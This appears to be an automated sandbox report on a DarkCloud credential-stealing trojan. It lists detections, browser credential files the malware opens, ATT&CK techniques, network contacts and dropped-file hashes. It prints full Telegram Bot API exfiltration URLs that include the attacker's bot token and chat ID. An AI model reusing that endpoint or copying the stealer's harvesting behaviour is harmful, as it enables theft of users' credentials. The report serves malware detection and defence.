Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformation

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39b9bc8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37d9570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.yMvZXcwN2OdoP6x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39914e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39b9bc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.3947ba8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.3767550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39914e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37d9570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.3767550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.3947ba8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LjlEiSlJe.exe PID: 7584, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39b9bc8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37d9570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.yMvZXcwN2OdoP6x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39914e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39b9bc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.3947ba8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.3767550.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.39914e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37d9570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yMvZXcwN2OdoP6x.exe.3767550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.LjlEiSlJe.exe.3947ba8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yMvZXcwN2OdoP6x.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LjlEiSlJe.exe PID: 7584, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	3 Obfuscated Files or Information	11 Input Capture	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	12 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	11 Input Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	221 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	51 Virtualization/Sandbox Evasion	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	112 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yMvZXcwN2OdoP6x.exe	47%	ReversingLabs	Win32.Trojan.DarkCloudSteal
yMvZXcwN2OdoP6x.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\LjlEiSlJe.exe	47%	ReversingLabs	Win32.Trojan.DarkCloudSteal

Source	Detection	Scanner	Label	Link
http://showip.net/s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
showip.net	162.55.60.2	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228	false	high
https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228	false	high
https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/mplates	LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732	LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/&	LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	yMvZXcwN2OdoP6x.exe, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMP	LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/M	yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/	LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003C1D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=	LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://showip.net/s	LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/x	yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://localhost/arkanoid_server/requests.php	LjlEiSlJe.exe, 0000000B.00000002.2160441879.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs	yMvZXcwN2OdoP6x.exe, 00000009.00000002.3290475887.0000000003BD7000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3290385356.0000000003C1D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	yMvZXcwN2OdoP6x.exe, 00000000.00000002.2102675046.0000000002701000.00000004.00000800.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000B.00000002.2160441879.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://showip.net/	yMvZXcwN2OdoP6x.exe, 00000009.00000002.3287834678.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000E.00000002.3287759720.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
162.55.60.2	showip.net	United States		35893	ACPCA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1567400
Start date and time:	2024-12-03 14:26:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yMvZXcwN2OdoP6x.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/73@2/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 72 Number of non-executed functions: 20
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target yMvZXcwN2OdoP6x.exe, PID 7388 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: yMvZXcwN2OdoP6x.exe

Simulations

Behavior and APIs

Time	Type	Description
08:27:11	API Interceptor	4307x Sleep call for process: yMvZXcwN2OdoP6x.exe modified
08:27:15	API Interceptor	24x Sleep call for process: powershell.exe modified
08:27:18	API Interceptor	4202x Sleep call for process: LjlEiSlJe.exe modified
14:27:17	Task Scheduler	Run new task: LjlEiSlJe path: C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	NEW90FL0OtSHAz.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://connexion-espacesclients.support/gkm/	Get hash	malicious	Unknown	Browse
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse
	kelscrit.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	https://dsiete.co/share.html	Get hash	malicious	HTMLPhisher	Browse
	Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html	Get hash	malicious	HTMLPhisher	Browse
	P#U0142atno#U015b#U0107 8557899,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse
162.55.60.2	oS6KsQIqJxe038Y.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	showip.net/
	Purchase Order AB013058.PDF.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	showip.net/
	MSM8C42iAN.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	wMy37vlfvz.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	8m65n7ieJC.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Factura modificada____678979879.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Pago SEPA.pdf.exe	Get hash	malicious	GuLoader	Browse	showip.net/
	Lista de cotizaciones.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	New Order___________pdf.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Payment Receipt Attached PDF.exe	Get hash	malicious	GuLoader	Browse	showip.net/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
showip.net	oS6KsQIqJxe038Y.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	162.55.60.2
	Purchase Order AB013058.PDF.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	162.55.60.2
	MSM8C42iAN.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	wMy37vlfvz.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	8m65n7ieJC.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Factura modificada____678979879.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Pago SEPA.pdf.exe	Get hash	malicious	GuLoader	Browse	162.55.60.2
	Lista de cotizaciones.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	New Order___________pdf.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Payment Receipt Attached PDF.exe	Get hash	malicious	GuLoader	Browse	162.55.60.2
api.telegram.org	NEW90FL0OtSHAz.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://connexion-espacesclients.support/gkm/	Get hash	malicious	Unknown	Browse	149.154.167.220
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	kelscrit.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	https://dsiete.co/share.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	P#U0142atno#U015b#U0107 8557899,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	NEW90FL0OtSHAz.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://connexion-espacesclients.support/gkm/	Get hash	malicious	Unknown	Browse	149.154.167.220
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	kelscrit.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	https://dsiete.co/share.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	P#U0142atno#U015b#U0107 8557899,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220
ACPCA	la.bot.mips.elf	Get hash	malicious	Mirai	Browse	162.55.163.242
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	162.10.135.213
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	162.52.132.181
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	162.48.192.235
	sora.arm.elf	Get hash	malicious	Mirai	Browse	162.64.49.53
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	162.36.86.178
	i586.elf	Get hash	malicious	Unknown	Browse	162.64.13.162
	sh4.elf	Get hash	malicious	Mirai	Browse	162.60.248.105
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	162.54.149.125
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	162.56.52.25

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Curri.lNK.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	36244920cQPUT1.lNK.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	1099833039444.pdf.js	Get hash	malicious	Remcos	Browse	149.154.167.220
	kelscrit.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	1013911.js	Get hash	malicious	FormBook	Browse	149.154.167.220
	cHtIyrhXeG.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	HiDOalUAfc.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	dFezsjdHtg.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	pjAYMCVbvK.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yMvZXcwN2OdoP6x.exe.log

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379677338874509
Encrypted:	false
SSDEEP:	48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//8PUyus:tLHxvIIwLgZ2KRHWLOug8s
MD5:	0409BC4E22C202C47D580902DAA656F4
SHA1:	FF4E4FD1293C724A149AE0A1128D7B02CEFAED17
SHA-256:	028122B959E6E45EC84CE434E2266AC3296C0ADAB2A37C391E0DEDFCA1823206
SHA-512:	6710C3E7F5822EB83F2C5228117076D73D4785AE7A7121733B5D248D9059BDDF920D750D44717B80D2E1B19E24EC276C9EFCF7DF840E3F8D73F0E1CA35C2E5E3
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\IXa08084

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	13722
Entropy (8bit):	7.834040750854896
Encrypted:	false
SSDEEP:	192:J4xYrixcwnfC0nfCV2Ff227MwUnm84On4dqCxJCJgaSYKpIKxTrUaN8Wchb:J4xjd/pP7knx4dqCfyR4fNu1
MD5:	D73135D69A1B4EA0F173B3DE26651A30
SHA1:	EA8D9BCD6B433987F7DFC9E8B76057D58F789ABD
SHA-256:	D8EE383CFFD07F01EE00CDFD84F78AE958E2AA009F815B4C10D1628AFED17E95
